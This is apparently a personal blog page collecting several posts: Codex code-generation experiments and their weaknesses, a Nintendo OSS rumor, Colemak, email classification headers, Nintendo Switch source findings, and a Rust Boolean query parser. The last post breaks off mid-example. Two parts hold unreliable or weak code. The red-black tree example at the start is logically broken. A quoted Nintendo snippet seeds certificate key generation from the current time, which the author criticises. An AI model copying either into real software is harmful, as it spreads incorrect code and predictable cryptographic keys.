We can look at the code: ``` static void rb_insert_color(struct rb_node *node, struct rb_root *root) { struct rb_node *parent = NULL; while (node->__rb_parent_color) { parent = rb_parent(node); if (!parent) goto out; if (parent->rb_left == node) { if (__rb_is_black(parent)) goto out; __rb_rotate_right(parent, root); } else { if (__rb_is_black(parent)) goto out; __rb_rotate_left(parent, root); } } rb_erase_augmented(node, root); node->__rb_parent_color = RB_BLACK; out: ; } ``` The code checks the parent of the node, and if the node has a parent then it checks if the parent is black. If it is, then we're done. If the node's parent is red, then we need to rebalance the tree. If the node is the left child of its parent, then we rotate right around the parent. If the node is the right child of its parent, then we rotate left around the parent. If the node has no parent, then we've reached the root, and we're done. If you've been following along, then you'll notice that the __rb_insert_color() function basically implements the same rebalancing procedure every time. This is because the __rb_insert_color() function is called any time a new node is added to the tree, and that includes when the root is added. And that's how we insert into a red-black tree. I hope you've enjoyed this journey through the implementation details of the red-black tree. I'm sure there's plenty more to learn about the implementation of the red-black tree, but I'm not going to discuss anything else right now. To recap, here's a list of all the different rebalancing procedures that are used to maintain balance in the red-black tree: 1. __rb_rotate_left() 2. __rb_rotate_right() 3. __rb_insert_color() 4. __rb_erase() 5. __rb_erase_augmented() There's a lot of code in rb.c just for rebalancing the red-black tree, but this is the gist of how it works. I hope you've enjoyed this journey through the implementation details of the red-black tree. So that's it for this video. Thank you for watching. I'll see you in the next video.

Weaknesses

Stopping

Codex will often generate more than the desired code: it will generate a function from a comment, and then start generating whatever functions it thinks should be written next. The easiest way to work around this is to stop generating tokens once you see something like } at the same indentation level as the prompt. You could also be more advanced and parse the Codex outputs to stop when there is a full AST for a function, as Copilot seems to do. In this blog post, I have manually decided where to cut off outputs.
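Here’s a rough sketch of that indentation-based cutoff – a heuristic along the lines of what I did by hand, not what Copilot actually does:

# Keep completion lines until one closes a block back at (or above) the
# prompt's indentation level, e.g. a "}" in column 0 for a C-like
# top-level function.
def truncate_completion(completion: str, prompt_indent: int = 0) -> str:
    kept = []
    for line in completion.splitlines():
        kept.append(line)
        indent = len(line) - len(line.lstrip())
        if line.strip().startswith("}") and indent <= prompt_indent:
            break                      # the prompted function just ended
    return "\n".join(kept)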

Dependencies

Codex will often reference other code that doesn’t actually exist. Here, it references an is_prime function without actually writing it.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
/// Finds the nth prime. fn nth_prime(n: usize) -> usize { let mut primes = vec![2]; let mut i = 3; while primes.len() < n { if is_prime(i, &primes) { primes.push(i); } i += 2; } primes[n - 1] }

Most of the time we can fix this by just prompting Codex with the start of the missing function declaration:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
/// Finds the nth prime. fn nth_prime(n: usize) -> usize { let mut primes = vec![2]; let mut i = 3; while primes.len() < n { if is_prime(i, &primes) { primes.push(i); } i += 2; } primes[n - 1] } fn is_prime(n: usize, primes: &Vec<usize>) -> bool { for p in primes { if n % p == 0 { return false; } } true }

Now the code works.

Switching languages

Sometimes Codex will suddenly go: “Surprise! That was actually just part of a string in a different language”. I find this happens most with languages that are often embedded, like LaTeX and HTML.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
\documentclass[]{article} \usepackage{amsmath,amsthm,amssymb} \newtheorem{thm}{Theorem} %opening \title{Proof of Theorem} \author{} \date{} \begin{document} \maketitle %body \begin{abstract} \end{abstract} \section{Theorem} \begin{proof} \end{proof} \end{document} """ def main(): if len(sys.argv) < 2: print("Usage: python3 proof.py ") sys.exit(1) theorem = sys.argv[1] with open("theorem.tex", "w") as f: f.write(template.replace("Theorem", theorem)) os.system("pdflatex theorem.tex") os.system("rm theorem.aux theorem.log") if __name__ == "__main__": main()

You can work around this by stopping at the right point: for LaTeX, when you see \end{document} just stop requesting tokens. Some prompt engineering indicating that it’s just a single file might also help.
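The API’s stop parameter is the easy way to do that “just stop requesting tokens” step (same caveats about the client interface as in the earlier API sketch; the prompt is a placeholder):

# Use a stop sequence so generation halts when the LaTeX document ends,
# instead of Codex wandering off into a Python string.
import openai

latex_prompt = "\\documentclass{article}\n% Prove the theorem\n"  # placeholder

completion = openai.Completion.create(
    engine="davinci-codex",
    prompt=latex_prompt,
    temperature=0,
    max_tokens=512,
    stop=["\\end{document}"],
)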

Inability to backtrack

There’s no easy way to tell Codex to generate in the middle of some text. You either need to get it to generate at the end, or find some other way to convey the text that comes after the generation.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
In the code: ``` function d(a, b) { ??? } console.assert(d(10, 20) === 200); ``` ??? is: `return a * b;`

That demo was cherry-picked for a good result. Most of the tests I tried didn’t work out well. Most of the time Codex isn’t able to figure that sort of problem out. Here is a fairly typical result, where Codex gives an answer that doesn’t make any sense (a and b aren’t defined here).

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
In the code: ``` function d() { ??? } console.assert(d() === 8); ``` ??? is: `return a + b;`

Perhaps there is some better way to prompt Codex to generate code in the middle of other code, but I haven’t found any.

Conclusion

(edit: see the introduction at the top for what you are looking for if you just jumped to the conclusion)

That’s it! I had a fun time exploring what Codex can do, and I can’t wait to see what will happen next in the code generation space!


  1. It probably also works with open source builds (such as Code - OSS or VSCodium), although I am unable to verify this. Microsoft has released other proprietary plugins that utilize DRM to ensure that they only run on official builds. ↩︎

  2. Oddly, that link says I got #75, but the leaderboard page says I got #79. I’m going with the higher number. ↩︎

  3. That’s not to say PHP is a bad language. It’s not impossible to write secure PHP code, and knowing the basics of PHP security will get you a long way. PHP has done a lot to make the language more secure, but there is a lot of really insecure PHP code out there. PHP is disadvantaged by having much more historical baggage than newer languages. ↩︎

  4. Although both versions still have a reflected XSS issue by echoing the $name without escaping it. But this would only allow the user making the request to XSS themselves, without giving them complete database control. It’s an improvement! ↩︎

openai

By · · 0 minute read

Accidentally causing a Switch rumor

By · · 4 minute read

Recently I stumbled upon this Reddit post in a subreddit for gaming rumors while trying to find information about Nintendo’s OSS code. This is a page on Nintendo’s website with some source code that they are obligated to release1:

The Nintendo OSS “Open Source Software” webpage is rarely updated unless a high-profile OS release occurs. It usually takes months for small updates to have source published (like v12.0.0 for example, still not there).

The page was updated sometime this weekend to add the text “or later version” to “Nintendo Switch [Ver. 11.0.0]” and “Wii U [Ver 5.5.2]”. This is such a minor update it seems unlikely that devs would bother tidying this page unless they anticipate adding more to it soon. (ie: adding OSS for new software/hardware).

Current page: https://www.nintendo.co.jp/support/oss/index.html

Cached page before this page was updated (Most recent I could find, June 5th): https://webcache.googleusercontent.com/search?q=cache:B8KOgxP1BxkJ:https://www.nintendo.co.jp/support/oss/index.html+&cd=2&hl=en&ct=clnk&gl=us

Take as a grain of salt, but devs usually don’t update low-profile webpages for no reason, especially the same weekend as E3.

This was not a result of Nintendo tidying up their page while preparing for something. I was the person who instigated that change. Around a week earlier, I had also noticed that “v12.0.0 for example, [was] still not there”. Nintendo OSS code has given me one great blog post before, and I was getting desperate for some content. Instead of doing nothing, I emailed Nintendo of America’s legal department to see what was up. A bit of digging turned up that their email address was noalegal [amot] noa.nintendo.com, and so I asked them:

Hi there! I am trying to find the OSS (open source software) included in version 12.0 of the Nintendo Switch system software. It seems that https://www.nintendo.co.jp/support/oss/ only goes up to version 11.0, how could I get the OSS for version 12.0?

Five days later, I got a reply (in all italics for whatever reason):

Thank you for your inquiry about the open source software in version 12.0 of the Nintendo Switch console. The OSS has not changed since version 11.0.0. The Nintendo open source software source code webpage has been updated to reflect this more clearly, indicating that the software made available is for version 11.0.0 and later.

Best regards,

Legal Department

Nintendo of America Inc.

This wasn’t the devs randomly tidying up a page; they did it because I asked them about it. So I guess the moral of the story is that most gaming rumors are wrong (to be fair, the post did say to take it with a grain of salt). People will notice random things that Nintendo does and assume that there is some deeper reason for it. Things are usually not done for deeper reasons. Also, yay, I caused a gaming rumor!

(also Switch OSS for 12.1.0 is now out! does seem moderately interesting, check it out.)


  1. Not that you can actually do anything with the source code other than look at it. The source code needs to be statically linked against the Nintendo Switch SDK to compile, and the only way to get your hands on the Switch SDK is to become a licensed Switch developer (which involves signing a NDA). ↩︎

typing

By · · 0 minute read

Using Colemak for a year

By · · 4 minute read

Around a year ago, I decided to try using the Colemak keyboard layout. It is an alternative to the standard QWERTY layout that is supposed to be faster to type with, and has better hand ergonomics. QWERTY is a very old keyboard layout that was designed for old typewriters, and as such the positioning of keys is less than ideal. Colemak is designed for modern keyboards, and positions keys to minimize the distance travelled by fingers. Unlike some other layouts (such as Dvorak), Colemak isn’t completely different from QWERTY. Common keyboard shortcuts like CTRL-C, CTRL-V, CTRL-X, CTRL-A are kept in the same place, the bottom row is almost entirely unchanged, most keys are typed with the same hand as QWERTY, and many keys aren’t even moved at all. This gives the benefits of a better keyboard layout while minimizing the amount that needs to be relearned from scratch.

Setting up for Colemak

Most operating systems have support for Colemak built in. Some notes:

  • The Debian 10 installer doesn’t offer Colemak as an option, but you can switch to it once installed
  • GNOME and Plasma both support Colemak
  • ChromeOS supports Colemak, and even allows remapping the search key to backspace
  • Windows doesn’t have Colemak support built in; you have to QWERTY your way through the setup process, then install Colemak from the Internet :(

Learning Colemak

While I was able to type fairly fast with QWERTY, I never learned to touch type the “proper” way. I just kinda let my fingers sprawl across the keyboard, and my fingers didn’t return to the home row. I was forced to learn to properly touch type with Colemak, since I couldn’t look at the keyboard while typing – the letters printed on the keys were unrelated to the letters they actually typed!

It took me a few months to be able to type in Colemak at my former QWERTY speeds. I initially used Colemak Academy to learn a few keys at a time. Once I was able to type with the whole keyboard (albeit very slowly), I used Monkeytype to improve my speed and accuracy. When I was ready, I stopped using QWERTY entirely and used just Colemak for all of my typing. This was rough at first: having all of my typing be significantly slower felt bad, but within a few weeks I was able to type at a normal pace again.

A graph of WPM vs time, going from around 50 WPM to around 80 WPM

2 months of typing practice, from around when I switched to Colemak full time

Using Colemak

Once I got good at typing with Colemak, it felt better for me to type. Sometimes when I am typing it feels like I am doing an intricate dance with a keyboard, a feeling I never got with QWERTY. It feels very nice to type with Colemak.

One annoying thing with Colemak is that it isn’t QWERTY, and how applications handle keyboard shortcuts can vary quite a bit, since the logical key layout (Colemak) differs from the scancodes reported by the keyboard (which are in QWERTY). Most applications just use the logical key pressed – if you want to save in Blender, enter CTRL+(whatever key corresponds to S). But some applications use the physical key pressed – to save in VSCodium, you enter CTRL+(the physical key labelled S). This mismatch between applications often confuses me, and it is especially annoying when using applications through a VM layer that remaps scancodes: when I am using VSCodium normally, shortcuts are based on physical keys, but when I am using it through Crostini, they are based on logical keys.

That being said, I have quite enjoyed using Colemak. If you can handle slower typing for a few months, I would recommend learning Colemak. It is an investment in your future.

SecurityClassificationLevel in email headers

By · · 2 minute read

Recently I got a non-automated email from a government agency. While the email was interesting, what was more interesting was the email headers, one of which looked like

x-titus-metadata-40: eyJDYXRlZ29yeUxhYmVs...

It was a long base64-encoded JSON blob ({"... is encoded as ey... in base64, making it easy to find base64-encoded JSON in random text). What is this metadata? Decoding and beautifying it, we get:

{
    "CategoryLabels": "",
    "Metadata": {
        "ns": "http://www.titus.com/ns/Canada Revenue Agency",
        "id": "c8ba42f7-485a-4f67-9d1c-d8894d61b092",
        "props": [{
            "n": "SecurityClassificationLevel",
            "vals": [{
                "value": "UNCLASSIFIED"
            }]
        }, {
            "n": "ENTRUSTPB",
            "vals": []
        }, {
            "n": "ENTRUSTPA",
            "vals": []
        }, {
            "n": "LanguageSelection",
            "vals": [{
                "value": "ENGLISH"
            }]
        }, {
            "n": "VISUALMARKINGS",
            "vals": [{
                "value": "NO"
            }]
        }]
    },
    "SubjectLabels": [],
    "TMCVersion": "18.8.1929.167",
    "TrustedLabelHash": "5znhThZ3xzv6l+uQTC2qtBUIn+l4v2gdmHRD0Y/bl0j3NE3rN1EMwNE+kj5dpk/l"
}

It looks like they have software (Titus) that automatically adds metadata about how emails are classified/protected. Neat! I unfortunately have not gotten any secret information emailed to me so I don’t know what this would look like if the email was classified (although hopefully Titus would be able to prevent sending classified emails to people like me who shouldn’t have access to it).
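
If you want to decode a header like this yourself, it’s just base64-decoding the value and pretty-printing the resulting JSON. Here’s a minimal sketch in Rust (assuming the base64 and serde_json crates; any language’s standard base64 and JSON tooling works just as well):

// Sketch: decode a Titus-style metadata header value (hypothetical helper,
// assumes the `base64` and `serde_json` crates).
fn decode_titus_header(value: &str) -> Result<String, Box<dyn std::error::Error>> {
    let bytes = base64::decode(value)?;                            // base64 -> raw JSON bytes
    let json: serde_json::Value = serde_json::from_slice(&bytes)?; // parse
    Ok(serde_json::to_string_pretty(&json)?)                       // beautify
}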

It also seems like this header isn’t present in automated emails, which go through a different system to get to me.

Interesting things in Nintendo's OSS code

By · · 6 minute read

The Nintendo Switch (called the Nintendo NX during development, and called the NX in the source code) has some open source parts, and Nintendo very kindly allows the source code for these parts to be viewed. They don’t make it easy though: you have to figure out how to download a ZIP file from a Japanese website. I’ve put it on GitHub if you want to take a look easily. The source code is almost entirely just the code behind the browser in the Nintendo Switch, although it’s not exactly easy to load this browser in the first place without instructions on how to do so. I’m fairly surprised that Nintendo went through all the effort of including a whole browser in the Switch despite it only being used when someone’s on a Wi-Fi network that requires a login – not exactly a common scenario, given that most of the time Switches will be connected to personal networks without any such weird portals. According to the source code, the name of the browser is “NetFront Browser NX”. NetFront appears to be the creator of this browser.

It’s not actually possible to run the NetFront Browser NX locally, because it depends on the Switch SDK, and you have to sign an NDA with Nintendo to even get a chance of being able to use that.

I’ve picked out some things that are at least moderately interesting from the OSS source code. Most of the changes Nintendo has made are really mundane, and I’ve left those out. These mundane things are mostly renaming main functions to Nintendo’s preferred naming convention (I think they have some sort of testing framework that looks for testMain).

Something that happens across all these directories is the use of the nxLog* family of functions, which are like printf but slightly different to suit the Switch’s needs.

src_0.16.0 and src_1.16.10

I’m not actually sure what or why these directories were included. All of the files in these directories start with a licence that is definitely not open-source:

/*--------------------------------------------------------------------------------*
  Copyright (C)Nintendo. All rights reserved.

  These coded instructions, statements, and computer programs contain
  information of Nintendo and/or its licensed developers and are protected
  by national and international copyright laws.

  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
  OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
  MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
  CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
  TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
  SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 *--------------------------------------------------------------------------------*/

But if we take a look anyway, it seems (given the weird assembly and C++ code) that these directories provide the glue for WebKit to work on the Switch OS. They also seem to imply that the browser is compiled with musl.

nss

Looks like Nintendo is a fan of static linking (nss/lib/freebl/loader.c):

/*  On NNSDK we statically link all of our libs, so we don't really need to
    load anything or do the symbol redirection done on other platforms.  */

They increase the DEFAULT_OCSP_CACHE_SIZE from 64 to 1000 on the Switch because I guess more caching is good?

In nss/cmd/certutil/keystuff.c they change certificate generation to use the current time (PR_Now()) instead of actual randomness to create certificates. I sure hope certificates generated this way were only used for testing…

#ifdef NN_NINTENDO_SDK
/*  Rather than take key input, use a psuedo-RNG  */
#define XOR_SHIFT_STAR_64_SPECIAL_VAL   (2685821657736338717ULL)

static PRUint64 xorShiftStar64State = 0;

static PRUint64 genPsRandXorShiftStar() {
    if (xorShiftStar64State == 0) {
        xorShiftStar64State = PR_Now();
    }

    xorShiftStar64State ^= xorShiftStar64State >> 12;
    xorShiftStar64State ^= xorShiftStar64State << 25;
    xorShiftStar64State ^= xorShiftStar64State >> 27;
    return xorShiftStar64State * XOR_SHIFT_STAR_64_SPECIAL_VAL;
}

#endif

webkit_1.16.10

The only interesting things here are that the CSS media queries -webkit-nintendo-switch-device-console and -webkit-nintendo-switch-device-handheld are added. They can be used to detect whether the Switch is docked or not. Neat!

WKC_0.16.0/WKC_1.16.10

This appears to be the code that takes the libraries and makes them into an actual browser, with the needed UI, and platform integrations. It looks like many of the files here were written for the sole purpose of being used in the Switch browser. Searching for most of the lines in these files turns up only repos with the Switch source code. They have a lot of code ifdefed behind things like WKC_CUSTOMER_PATCH_0304674: it appears that NetFront has other clients, and these patches are just for Nintendo (or maybe Nintendo and also some other clients?)

Looks like they’re taking a step in the right direction here and disabling support for the outdated SSLv2 and SSLv3 protocols at compile time!

#if defined(SSL_OP_NO_SSLv2) && !defined(OPENSSL_NO_SSL2)
#define OPENSSL_SUPPORT_SSLv2
#undef OPENSSL_SUPPORT_SSLv2 // NX never support SSLv2
#endif
#if defined(SSL_OP_NO_SSLv3) && !defined(OPENSSL_NO_SSL3)
#define OPENSSL_SUPPORT_SSLv3
#undef OPENSSL_SUPPORT_SSLv3 // NX never support SSLv3
#endif

The Switch browser appears to be one of the first with support for Web NFC, presumably using the NFC reader in the Switch. Neat!

Let me know if you find any other interesting things in the source!

internet

By · · 0 minute read

ttw

By · · 0 minute read

Writing a Boolean expression parser in Rust

By · · 15 minute read

While using my time tracking system, TagTime Web, I have on many occasions wanted to use some complex logic to select pings. My first implementation just had a simple way to include and exclude pings, but that later proved insufficient for my needs. I had considered building a more complex system at first, but decided it was better to wait until the need actually arose. Well, after using TagTime Web for a while, the need did arise, at least for me, so I built such a query system. Here, I will explain how I implemented it.

Here are some example queries, each with different syntax, demonstrating the range of ways queries can be formulated:

  • To find time I’m distracted on social media, I can use a query like distracted and (hn or twitter or fb)
  • To find time I’m programming something other than TagTime Web, I can do code & !ttw
  • To find time I’m using GitHub but not for programming or working on TagTime Web, I can do gh AND !(code OR ttw)

My main goal with the query design was to make it very simple to understand how querying works – I didn’t want to make users read a long document before writing simple queries. I also wanted to write it in Rust, because I like Rust. It can be run in the browser via WebAssembly, and since I was running WASM in the browser already I wasn’t going to lose any more browser support than I already had. Rust is also pretty fast, which is a good thing, especially on devices with less computing power like phones (although I don’t think it made much of a difference in this case).

Let’s dive into the code. You can follow along with the source code if you want, but note that I explain the code in a slightly different order than the actual source. There are three main phases in the system: lexing, parsing, and evaluation.

Lexing

In the lexing phase, we convert raw text to a series of tokens that are easier to deal with. In this phase, different syntactic ways to write the same thing will be merged. For example, & and and will be represented with the same token. Lexing won’t do any validation that the provided tokens make sense, though: this phase is completely fine with unmatched brackets and operators without inputs. Here’s what the interface is going to look like:

let tokens = lex("foo and !(bar | !baz)").unwrap();
assert_eq!(
    tokens,
    vec![
        Token::Name { text: "foo".to_string() },
        Token::BinaryOp(BinaryOp::And),
        Token::Invert,
        Token::OpenBracket,
        Token::Name { text: "bar".to_string() },
        Token::BinaryOp(BinaryOp::Or),
        Token::Invert,
        Token::Name { text: "baz".to_string() },
        Token::CloseBracket
    ]
);

Let’s start implementing that by defining what a token is:

#[derive(Debug, Clone, PartialEq, Eq)]
enum Token {
    OpenBracket,
    CloseBracket,
    Invert,
    Name { text: String },
    BinaryOp(BinaryOp),
}

Instead of having two different tokens for &/and and |/or, I’ve created a single BinaryOp token type, since the two kinds of tokens will be treated the same after the lexing phase. It’s just an enum with two variants, although I could easily add more if I decide to in the future:

#[derive(Debug, Copy, Clone, PartialEq, Eq)]
enum BinaryOp {
    And,
    Or,
}

I’ve also implemented a few helper methods on BinaryOp – from_char, as_char, and from_text – that will help with lexing (there’s a sketch of what these might look like at the end of this section). Now let’s get on to actually lexing. We’ll declare a fn that takes a &str and returns a Result<Vec<Token>, &'static str>. We start out by defining the ParseState enum, inside lex:

fn lex(s: &str) -> Result<Vec<Token>, &'static str> {
    #[derive(Debug, Copy, Clone, Eq, PartialEq)]
    enum ParseState {
        /// Ready for any tokens.
        AnyExpected,
        /// In a name.
        InName,
        /// In a binary operation represented with symbols.
        InSymbolBinOp(BinaryOp),
    }

    let mut state = ParseState::AnyExpected;
    let mut tokens = Vec::new();
    let mut cur_name = String::new();

Did you know that you can define an enum inside a fn? This is pretty neat: it allows you to define an enum that’s only available inside the fn that defined it, which helps prevent implementation details from being exposed and used elsewhere. We’ll use this throughout lexing to keep track of what we’re currently looking at. Next, we’ll break the input string up into individual characters and loop over them:

for c in s.chars() {

Okay, time for the fun part: let’s build tokens out of these characters.

// the last token was "|" or "&", which has some special logic
if let ParseState::InSymbolBinOp(op) = state {
    state = ParseState::AnyExpected; // only do this for the immediate next char
    if c == op.as_char() {
        // treat "|" and "||" the same way
        continue;
    }
}

if state == ParseState::InName {
    let end_cur_token = match c {
        // stop parsing a tag as soon as we see a character starting an operator
        '(' | ')' | '!' => true,
        _ if BinaryOp::from_char(c) != None => true,

        _ if c.is_whitespace() => true, // whitespace also ends a tag
        
        _ => false,
    };
    if end_cur_token {
        let lower = cur_name.to_ascii_lowercase(); // tags are case insensitive

        if let Some(op) = BinaryOp::from_text(&lower) {
            // the word is "and" or "or", so treat it like a binary operation
            tokens.push(Token::BinaryOp(op));
        } else {
            // otherwise it's just a regular tag name
            tokens.push(Token::Name { text: cur_name });
        }

        cur_name = String::new(); // reset the current tag
        
        state = ParseState::AnyExpected; // anything could occur next
    } else {
        // not ending the current token, so add this character to the current tag
        cur_name.push(c);
    }
}

// any token could happen!
if state == ParseState::AnyExpected {
    let op = BinaryOp::from_char(c); // try to make a binary op out of this character
    match c {
        _ if op != None => {
            // we managed to create a binary operation
            tokens.push(Token::BinaryOp(op.unwrap()));
            state = ParseState::InSymbolBinOp(op.unwrap());
        }

        // operators
        '(' => tokens.push(Token::OpenBracket),
        ')' => tokens.push(Token::CloseBracket),
        '!' => tokens.push(Token::Invert),

        // ignore whitespace
        _ if c.is_whitespace() => {}
        
        // didn't start anything else, so we must be starting a tag
        _ => {
            state = ParseState::InName;
            cur_name = String::with_capacity(1);
            cur_name.push(c);
        }
    }
}

Finally, we check if there is any remaining tag info and return the tokens:

if !cur_name.is_empty() {
    let lower = cur_name.to_ascii_lowercase();
    if let Some(op) = BinaryOp::from_text(&lower) {
        tokens.push(Token::BinaryOp(op));
    } else {
        tokens.push(Token::Name { text: cur_name });
    }
}
Ok(tokens)
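
Earlier I mentioned the from_char, as_char, and from_text helpers on BinaryOp. For reference, they might look something like this (a sketch – the real implementations may differ slightly):

// Sketch of the BinaryOp helpers used by the lexer above.
impl BinaryOp {
    /// Try to turn a symbol ('&' or '|') into an operator.
    fn from_char(c: char) -> Option<Self> {
        match c {
            '&' => Some(Self::And),
            '|' => Some(Self::Or),
            _ => None,
        }
    }

    /// The symbol form of this operator.
    fn as_char(self) -> char {
        match self {
            Self::And => '&',
            Self::Or => '|',
        }
    }

    /// Try to turn a lowercased word ("and" or "or") into an operator.
    fn from_text(s: &str) -> Option<Self> {
        match s {
            "and" => Some(Self::And),
            "or" => Some(Self::Or),
            _ => None,
        }
    }
}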

Parsing

Here, we’ll take the stream of tokens and build it into an abstract syntax tree (AST). Here’s an example diagram (edit on quiver):

An AST diagram

This will represent the expression in a way that’s easy to evaluate. Here’s the definition:

#[derive(Debug, Clone, PartialEq, Eq)]
enum AstNode {
    /// The `!` operator
    Invert(Box<AstNode>),
    /// A binary operation
    Binary(BinaryOp, Box<AstNode>, Box<AstNode>),
    /// A name
    Name(String),
}

Munching tokens

Let’s implement the core of the parsing system, which converts a stream of Tokens into a single AstNode (probably with more AstNodes nested inside it). It’s called munch_tokens because it munches tokens until it’s done parsing the expression it sees. When it encounters brackets, it recursively parses the tokens inside them. If there are still tokens left over after the top-level call, then there are extra tokens at the end: an error. Here’s the declaration of munch_tokens:

impl AstNode {
    fn munch_tokens(
        tokens: &mut VecDeque<Token>,
        depth: u16,
    ) -> Result<Self, &'static str> {
        if depth == 0 {
            return Err("expression too deep");
        }
        // ...
    }
}

Notice that if there was an error during parsing, a static string is returned. Most parsers would include more detailed information about where the error occurred, but to reduce complexity I haven’t implemented any such logic. Also note that the input is a VecDeque instead of a normal Vec, which makes it faster to take tokens off the front, something we do often. I could also have implemented this by reversing the token input and manipulating the back of the token list, but that would make the code more complicated for fairly minimal performance gains. We also use depth to keep track of how deep we are going, and error if we get too deep, to limit the amount of computation we do, since we might be evaluating an expression with untrusted user input.

Now let’s write the core token munching loop using a while let expression. We can’t use a normal for loop here, since the tokens will be mutated in the loop.

while let Some(next) = tokens.get(0) {
    // ...
}
Err("unexpected end of expression")

Now for each token, we’ll match against it, and decide what to do. For some tokens, we can just error at that point.

match next {
    // some tokens can't happen here
    Token::CloseBracket => return Err("Unexpected closing bracket"),
    Token::BinaryOp(_) => return Err("Unexpected binary operator"),
    // ...
}

For tag names, we need to disambiguate between two cases: is the token being used by itself, or with a Boolean operator? Since binary operators sit between their operands, we need to look ahead to figure out this context. If we were using Reverse Polish Notation we wouldn’t have this problem, but alas we are stuck with harder-to-parse infix notation. If the parser sees such ambiguity, it fixes it by adding implicit opening and closing brackets, and trying again:

match next {
    // <snip>
    Token::Name { text } => {
        // could be the start of the binary op or just a lone name
        match tokens.get(1) {
            Some(Token::BinaryOp(_)) => {
                // convert to unambiguous form and try again
                tokens.insert(1, Token::CloseBracket);
                tokens.insert(0, Token::OpenBracket);
                return Self::munch_tokens(tokens, depth - 1);
            }
            Some(Token::CloseBracket) | None => {
                // lone token
                let text = text.clone();
                tokens.remove(0);
                return Ok(AstNode::Name(text));
            }
            Some(_) => return Err("name followed by invalid token"),
        }
    }
}

Next, let’s implement opening brackets. We munch the tokens inside the bracket, remove the closing bracket, then do the same binary operation checks as with tag names.

match next {
    // <snip>
    Token::OpenBracket => {
        tokens.remove(0); // open bracket
        let result = Self::munch_tokens(tokens, depth - 1)?;
        match tokens.remove(0) {
            // remove closing bracket
            Some(Token::CloseBracket) => {}
            _ => return Err("expected closing bracket"),
        };
        // check for binary op afterwards
        return match tokens.get(0) {
            Some(Token::BinaryOp(op)) => {
                let op = op.clone();
                tokens.remove(0).unwrap(); // remove binary op
                let ret = Ok(AstNode::Binary(
                    op,
                    Box::new(result),
                    Box::new(Self::munch_tokens(tokens, depth - 1)?),
                ));
                ret
            }
            Some(Token::CloseBracket) | None => Ok(result),
            Some(_) => Err("invalid token after closing bracket"),
        };
    }
}

Okay, one operator left: the ! operator, which negates its contents. I’ve made the design decision not to allow expressions with double negatives like !!foo, since there’s no good reason to do that.

match next {
    // <snip>
    Token::Invert => {
        tokens.remove(0);
        // invert exactly the next token
        // !a & b -> (!a) & b
        match tokens.get(0) {
            Some(Token::OpenBracket) => {
                return Ok(AstNode::Invert(Box::new(Self::munch_tokens(
                    tokens,
                    depth - 1,
                )?)));
            }
            Some(Token::Name { text }) => {
                // is it like "!abc" or "!abc & xyz"
                let inverted = AstNode::Invert(Box::new(AstNode::Name(text.clone())));
                match tokens.get(1) {
                    Some(Token::BinaryOp(_)) => {
                        // "!abc & xyz"
                        // convert to unambiguous form and try again
                        tokens.insert(0, Token::OpenBracket);
                        tokens.insert(1, Token::Invert);
                        tokens.insert(2, Token::OpenBracket);
                        tokens.insert(4, Token::CloseBracket);
                        tokens.insert(5, Token::CloseBracket);
                        return Self::munch_tokens(tokens, depth - 1);
                    }
                    None | Some(Token::CloseBracket) => {
                        // "!abc"
                        tokens.remove(0); // remove name
                        return Ok(inverted);
                    }
                    Some(_) => return Err("invalid token after inverted name"),
                }
            }
            Some(Token::Invert) => {
                return Err("can't double invert, that would be pointless")
            }
            Some(_) => return Err("expected expression"),
            None => return Err("expected token to invert, got EOF"),
        }
    }
}

Evaluation

Thanks to the way AstNode is written, evaluating AstNodes against some tags is really easy. By design, we can just recursively evaluate AST nodes.

impl AstNode {
    fn matches(&self, tags: &[&str]) -> bool {
        match self {
            Self::Invert(inverted) => !inverted.matches(tags),
            Self::Name(name) => tags.contains(&&**name),
            Self::Binary(BinaryOp::And, a1, a2) => a1.matches(tags) && a2.matches(tags),
            Self::Binary(BinaryOp::Or, a1, a2) => a1.matches(tags) || a2.matches(tags),
        }
    }
}

The only odd thing here is &&**name, which looks strange but is the right combination of symbols needed to convert a &String to a &&str (it goes &String -> String -> str -> &str -> &&str).

Putting it all together

We don’t want to expose all of these implementation details to users. Let’s wrap all of this behind a struct that takes care of calling the lexer and building an AST for our users. If we decide to completely change our implementation in the future, nobody will know, since we’ll have a very small API surface. There’s one more case we want to handle here: the empty input. AstNode can’t handle empty input, so we’ll implement that in our wrapper. This seems like it would work:

pub enum ExprData {
    Empty,
    HasNodes(AstNode),
}

But if you try that you’ll get a compile error.

error[E0446]: private type `AstNode` in public interface
  --> src/lib.rs:16:14
   |
8  | enum AstNode {
   | ------------ `AstNode` declared as private
...
16 |     HasNodes(AstNode),
   |              ^^^^^^^ can't leak private type

In Rust, data stored in enum variants is always implicitly pub, so this wrapper would allow users access to internal implementation details, which we don’t want. We can work around that by wrapping our wrapper:

#[derive(Debug, Clone, PartialEq, Eq)]
enum ExprData {
    Empty,
    HasNodes(AstNode),
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Expr(ExprData);

Now let’s implement some public fns that wrap the underlying AstNode:

const MAX_RECURSION: u16 = 20;

impl Expr {
    pub fn from_string(s: &str) -> Result<Self, &'static str> {
        // lex and convert to a deque
        let mut tokens: VecDeque<Token> = lex(s)?.into_iter().collect();
        if tokens.is_empty() {
            // no tokens
            return Ok(Self(ExprData::Empty));
        }

        let ast = AstNode::munch_tokens(&mut tokens, MAX_RECURSION)?;
        if !tokens.is_empty() {
            return Err("expected EOF, found extra tokens");
        }

        Ok(Self(ExprData::HasNodes(ast)))
    }

    pub fn matches(&self, tags: &[&str]) -> bool {
        match &self.0 {
            ExprData::Empty => true,
            ExprData::HasNodes(node) => node.matches(tags),
        }
    }
}
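
For example, using the finished Expr with one of the queries from earlier:

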